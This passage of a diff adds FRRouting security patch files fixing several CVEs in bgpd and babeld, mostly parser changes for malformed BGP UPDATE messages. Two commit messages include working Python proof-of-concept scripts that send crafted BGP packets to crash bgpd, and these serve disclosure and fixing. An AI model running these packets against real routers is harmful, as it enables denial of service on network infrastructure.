lib/event.c:1995 +15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213 +16 0x0000564dea261b83 in main (argc=, argv=) at bgpd/bgp_main.c:505 +``` + +With the configuration: + +``` +frr version 9.1-dev-MyOwnFRRVersion +frr defaults traditional +hostname ip-172-31-13-140 +log file /tmp/debug.log +log syslog +service integrated-vtysh-config +! +debug bgp keepalives +debug bgp neighbor-events +debug bgp updates in +debug bgp updates out +! +router bgp 100 + bgp router-id 9.9.9.9 + no bgp ebgp-requires-policy + bgp bestpath aigp + neighbor 172.31.2.47 remote-as 200 + ! + address-family ipv4 unicast + neighbor 172.31.2.47 default-originate + neighbor 172.31.2.47 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +! +``` + +The issue is that we try to process NLRIs even if the attribute length is 0. + +Later bgp_update() will handle route-maps and a crash occurs because all the +attributes are NULL, including aspath, where we dereference. + +According to the RFC 4271: + +A value of 0 indicates that neither the Network Layer + Reachability Information field nor the Path Attribute field is + present in this UPDATE message. + +But with a fuzzed UPDATE message this can be faked. I think it's reasonable +to skip processing NLRIs if both update_len and attribute_len are 0. + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 4947dbc21d..1ef421028f 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1951,7 +1951,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len) { ++ if (update_len && attribute_len) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.35.3 + diff --git a/0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch b/0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch new file mode 100644 index 0000000..d59a1d0 --- /dev/null +++ b/0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch @@ -0,0 +1,131 @@ +From 129adde0aef424778d6c4791b5be10e302db9320 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Thu, 13 Jul 2023 22:32:03 +0300 +Upstream: yes +References: CVE-2023-38802,bsc#1213284,https://github.com/FRRouting/frr/pull/14290 +Subject: [PATCH] bgpd: Use treat-as-withdraw for tunnel encapsulation + attribute + +Before this path we used session reset method, which is discouraged by rfc7606. + +Handle this as rfc requires. + +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index c6177a1b93..188393b752 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1301,6 +1301,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + case BGP_ATTR_LARGE_COMMUNITIES: + case BGP_ATTR_ORIGINATOR_ID: + case BGP_ATTR_CLUSTER_LIST: ++ case BGP_ATTR_ENCAP: + case BGP_ATTR_OTC: + return BGP_ATTR_PARSE_WITHDRAW; + case BGP_ATTR_MP_REACH_NLRI: +@@ -2426,26 +2427,21 @@ bgp_attr_ipv6_ext_communities(struct bgp_attr_parser_args *args) + } + + /* Parse Tunnel Encap attribute in an UPDATE */ +-static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ +- bgp_size_t length, /* IN: attr's length field */ +- struct attr *attr, /* IN: caller already allocated */ +- uint8_t flag, /* IN: attr's flags field */ +- uint8_t *startp) ++static int bgp_attr_encap(struct bgp_attr_parser_args *args) + { +- bgp_size_t total; + uint16_t tunneltype = 0; +- +- total = length + (CHECK_FLAG(flag, BGP_ATTR_FLAG_EXTLEN) ? 4 : 3); ++ struct peer *const peer = args->peer; ++ struct attr *const attr = args->attr; ++ bgp_size_t length = args->length; ++ uint8_t type = args->type; ++ uint8_t flag = args->flags; + + if (!CHECK_FLAG(flag, BGP_ATTR_FLAG_TRANS) + || !CHECK_FLAG(flag, BGP_ATTR_FLAG_OPTIONAL)) { +- zlog_info( +- "Tunnel Encap attribute flag isn't optional and transitive %d", +- flag); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute flag isn't optional and transitive %d", ++ flag); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + if (BGP_ATTR_ENCAP == type) { +@@ -2453,12 +2449,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + uint16_t tlv_length; + + if (length < 4) { +- zlog_info( ++ zlog_err( + "Tunnel Encap attribute not long enough to contain outer T,L"); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + tunneltype = stream_getw(BGP_INPUT(peer)); + tlv_length = stream_getw(BGP_INPUT(peer)); +@@ -2488,13 +2483,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + } + + if (sublength > length) { +- zlog_info( +- "Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", +- sublength, length); +- bgp_notify_send_with_data( +- peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d", ++ sublength, length); ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + /* alloc and copy sub-tlv */ +@@ -2542,13 +2535,10 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */ + + if (length) { + /* spurious leftover data */ +- zlog_info( +- "Tunnel Encap attribute length is bad: %d leftover octets", +- length); +- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, +- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, +- startp, total); +- return -1; ++ zlog_err("Tunnel Encap attribute length is bad: %d leftover octets", ++ length); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); + } + + return 0; +@@ -3387,8 +3377,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + case BGP_ATTR_VNC: + #endif + case BGP_ATTR_ENCAP: +- ret = bgp_attr_encap(type, peer, length, attr, flag, +- startp); ++ ret = bgp_attr_encap(&attr_args); + break; + case BGP_ATTR_PREFIX_SID: + ret = bgp_attr_prefix_sid(&attr_args); +-- +2.35.3 + diff --git a/0011-babeld-fix-11808-to-avoid-infinite-loops.patch b/0011-babeld-fix-11808-to-avoid-infinite-loops.patch new file mode 100644 index 0000000..06c2d6e --- /dev/null +++ b/0011-babeld-fix-11808-to-avoid-infinite-loops.patch @@ -0,0 +1,48 @@ +From 8a8f20d89585aa490e3cae5ad705ce23107fc1fe Mon Sep 17 00:00:00 2001 +From: harryreps +Date: Fri, 3 Mar 2023 23:17:14 +0000 +Upsteam: yes +References: CVE-2023-3748,bsc#1213434,gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952 +Subject: [PATCH] babeld: fix #11808 to avoid infinite loops + +Replacing continue in loops to goto done so that index of packet buffer +increases. + +Signed-off-by: harryreps +(cherry picked from commit ae1e0e1fed77716bc06f181ad68c4433fb5523d0) +Signed-off-by: Marius Tomaschewski + +diff --git a/babeld/message.c b/babeld/message.c +index 7d45d91bf7..2bf2337965 100644 +--- a/babeld/message.c ++++ b/babeld/message.c +@@ -439,7 +439,7 @@ parse_packet(const unsigned char *from, struct interface *ifp, + debugf(BABEL_DEBUG_COMMON, + "Received Hello from %s on %s that does not have all 0's in the unused section of flags, ignoring", + format_address(from), ifp->name); +- continue; ++ goto done; + } + + /* +@@ -451,7 +451,7 @@ parse_packet(const unsigned char *from, struct interface *ifp, + debugf(BABEL_DEBUG_COMMON, + "Received Unicast Hello from %s on %s that FRR is not prepared to understand yet", + format_address(from), ifp->name); +- continue; ++ goto done; + } + + DO_NTOHS(seqno, message + 4); +@@ -469,7 +469,7 @@ parse_packet(const unsigned char *from, struct interface *ifp, + debugf(BABEL_DEBUG_COMMON, + "Received hello from %s on %s should be ignored as that this version of FRR does not know how to properly handle interval == 0", + format_address(from), ifp->name); +- continue; ++ goto done; + } + + changed = update_neighbour(neigh, seqno, interval); +-- +2.35.3 + diff --git a/0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch b/0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch new file mode 100644 index 0000000..ced2b9c --- /dev/null +++ b/0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch @@ -0,0 +1,37 @@ +From 168204de6371f594c4f1ebac30ca3e181a851e39 Mon Sep 17 00:00:00 2001 +From: Donald Sharp +Date: Wed, 5 Apr 2023 14:57:05 -0400 +Subject: [PATCH] bgpd: Limit flowspec to no attribute means a implicit + withdrawal +Upsteam: yes +References: CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8 + +All other parsing functions done from bgp_nlri_parse() assume +no attributes == an implicit withdrawal. Let's move +bgp_nlri_parse_flowspec() into the same alignment. + +Reported-by: Matteo Memelli +Signed-off-by: Donald Sharp +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c +index 39c0cfe514..fe1f0d50f8 100644 +--- a/bgpd/bgp_flowspec.c ++++ b/bgpd/bgp_flowspec.c +@@ -112,6 +112,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, + afi = packet->afi; + safi = packet->safi; + ++ /* ++ * All other AFI/SAFI's treat no attribute as a implicit ++ * withdraw. Flowspec should as well. ++ */ ++ if (!attr) ++ withdraw = 1; ++ + if (packet->length >= FLOWSPEC_NLRI_SIZELIMIT_EXTENDED) { + flog_err(EC_BGP_FLOWSPEC_PACKET, + "BGP flowspec nlri length maximum reached (%u)", +-- +2.35.3 + diff --git a/0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch b/0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch new file mode 100644 index 0000000..dc1a41c --- /dev/null +++ b/0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch @@ -0,0 +1,115 @@ +From 1fdbfffbe343ad63c32ff37998300b0b4f67d8fb Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Mon, 23 Oct 2023 23:34:10 +0300 +Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE + message +Upstream: yes +References: CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4 + +If we send a crafted BGP UPDATE message without mandatory attributes, we do +not check if the length of the path attributes is zero or not. We only check +if attr->flag is at least set or not. Imagine we send only unknown transit +attribute, then attr->flag is always 0. Also, this is true only if graceful-restart +capability is received. + +A crash: + +``` +bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) +bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 +BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] +BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] +BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] +BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] +BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] +BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] +BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] +BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] +BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] +BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] +BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] +BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] +BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] +``` + +Sending: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(1000) +s.close() +``` + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit d8482bf011cb2b173e85b65b4bf3d5061250cdb9) +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 188393b752..5c028c854c 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3098,13 +3098,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args) + } + + /* Well-known attribute check. */ +-static int bgp_attr_check(struct peer *peer, struct attr *attr) ++static int bgp_attr_check(struct peer *peer, struct attr *attr, ++ bgp_size_t length) + { + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an + * empty UPDATE. */ +- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) ++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && ++ !length) + return BGP_ATTR_PARSE_PROCEED; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +@@ -3156,7 +3158,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + enum bgp_attr_parse_ret ret; + uint8_t flag = 0; + uint8_t type = 0; +- bgp_size_t length; ++ bgp_size_t length = 0; + uint8_t *startp, *endp; + uint8_t *attr_endp; + uint8_t seen[BGP_ATTR_BITMAP_SIZE]; +@@ -3478,7 +3480,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + } + + /* Check all mandatory well-known attributes are present */ +- ret = bgp_attr_check(peer, attr); ++ ret = bgp_attr_check(peer, attr, length); + if (ret < 0) + goto done; + +-- +2.35.3 + diff --git a/0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch b/0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch new file mode 100644 index 0000000..83edea3 --- /dev/null +++ b/0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch @@ -0,0 +1,121 @@ +From f2bc4e6847b222ed8fbd460fbba9aa69d1bf8d0e Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Fri, 20 Oct 2023 17:49:18 +0300 +Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session + reset +Upstream: yes +References: CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35 + +Avoid crashing bgpd. + +``` +(gdb) +bgp_mp_reach_parse (args=, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 +2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); +(gdb) +stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 +320 { +(gdb) +321 STREAM_VERIFY_SANE(s); +(gdb) +323 if (STREAM_READABLE(s) < size) { +(gdb) +34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); +(gdb) + +Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. +0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, + object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 +2282 if (path->attr->aspath->refcnt) +(gdb) +``` + +With the configuration: + +``` + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + address-family ipv4 unicast + redistribute connected + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit b08afc81c60607a4f736f418f2e3eb06087f1a35) +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 5c028c854c..42a2342f6f 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2224,7 +2224,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, + + mp_update->afi = afi; + mp_update->safi = safi; +- return BGP_ATTR_PARSE_EOR; ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); + } + + mp_update->afi = afi; +@@ -3405,10 +3405,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + goto done; + } + +- if (ret == BGP_ATTR_PARSE_EOR) { +- goto done; +- } +- + if (ret == BGP_ATTR_PARSE_ERROR) { + flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, + "%s: Attribute %s, parse error", peer->host, +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 4963ea64d0..23767153b2 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -382,7 +382,6 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, +- BGP_ATTR_PARSE_EOR = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 1ef421028f..20c642190b 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2027,8 +2027,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + * Non-MP IPv4/Unicast EoR is a completely empty UPDATE + * and MP EoR should have only an empty MP_UNREACH + */ +- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) +- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) { ++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { + afi_t afi = 0; + safi_t safi; + struct graceful_restart_info *gr_info; +@@ -2049,9 +2048,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + && nlris[NLRI_MP_WITHDRAW].length == 0) { + afi = nlris[NLRI_MP_WITHDRAW].afi; + safi = nlris[NLRI_MP_WITHDRAW].safi; +- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { +- afi = nlris[NLRI_MP_UPDATE].afi; +- safi = nlris[NLRI_MP_UPDATE].safi; + } + + if (afi && peer->afc[afi][safi]) { +-- +2.35.3 + diff --git a/0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch b/0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch new file mode 100644 index 0000000..98ea81d --- /dev/null +++ b/0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch @@ -0,0 +1,109 @@ +From fcd12ca92baf2be4b191ddc3d3021c276c635930 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Fri, 27 Oct 2023 11:56:45 +0300 +Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of + malformed attrs +Upstream: yes +CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b + +Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be +processed as a normal UPDATE without mandatory attributes, that could lead +to harmful behavior. In this case, a crash for route-maps with the configuration +such as: + +``` +router bgp 65001 + no bgp ebgp-requires-policy + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + ! + address-family ipv4 unicast + neighbor 127.0.0.1 addpath-tx-all-paths + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Send a malformed optional transitive attribute: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(100) +s.close() +``` + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 42a2342f6f..fc92dbb326 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3104,10 +3104,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an +- * empty UPDATE. */ ++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, ++ * we will pass it to be processed as a normal UPDATE without mandatory ++ * attributes, that could lead to harmful behavior. ++ */ + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && + !length) +- return BGP_ATTR_PARSE_PROCEED; ++ return BGP_ATTR_PARSE_WITHDRAW; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required + to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +@@ -3532,7 +3535,13 @@ done: + aspath_unintern(&as4_path); + + transit = bgp_attr_get_transit(attr); +- if (ret != BGP_ATTR_PARSE_ERROR) { ++ /* If we received an UPDATE with mandatory attributes, then ++ * the unrecognized transitive optional attribute of that ++ * path MUST be passed. Otherwise, it's an error, and from ++ * security perspective it might be very harmful if we continue ++ * here with the unrecognized attributes. ++ */ ++ if (ret == BGP_ATTR_PARSE_PROCEED) { + /* Finally intern unknown attribute. */ + if (transit) + bgp_attr_set_transit(attr, transit_intern(transit)); +-- +2.35.3 + diff --git a/0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch b/0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch new file mode 100644 index 0000000..b46d113 --- /dev/null +++ b/0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch @@ -0,0 +1,90 @@ +From 4e39893cfb2d4dbc13fa6d6a25bbf623ed14a4fb Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Sun, 29 Oct 2023 22:44:45 +0200 +Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI +Upstream: yes +CVE-2023-47234,bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf + +If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if +no mandatory path attributes received. + +In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled +as a new data, but without mandatory attributes, it's a malformed packet. + +In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST +handle that. + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index fc92dbb326..ae0f052c42 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3112,15 +3112,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + !length) + return BGP_ATTR_PARSE_WITHDRAW; + +- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +- are present, it should. Check for any other attribute being present +- instead. +- */ +- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && +- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) +- return BGP_ATTR_PARSE_PROCEED; +- + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; + +@@ -3139,6 +3130,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) + type = BGP_ATTR_LOCAL_PREF; + ++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required ++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI ++ * are present, it should. Check for any other attribute being present ++ * instead. ++ */ ++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && ++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) ++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY ++ : BGP_ATTR_PARSE_PROCEED; ++ + /* If any of the well-known mandatory attributes are not present + * in an UPDATE message, then "treat-as-withdraw" MUST be used. + */ +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 23767153b2..27708c0689 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -382,6 +382,7 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, ++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 20c642190b..b175a26ab9 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1951,7 +1951,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len && attribute_len) { ++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then ++ * NLRIs should be handled as a new data. Though, if we received ++ * NLRIs without mandatory attributes, they should be ignored. ++ */ ++ if (update_len && attribute_len && ++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.35.3 + diff --git a/0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch b/0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch new file mode 100644 index 0000000..a0e9c5a --- /dev/null +++ 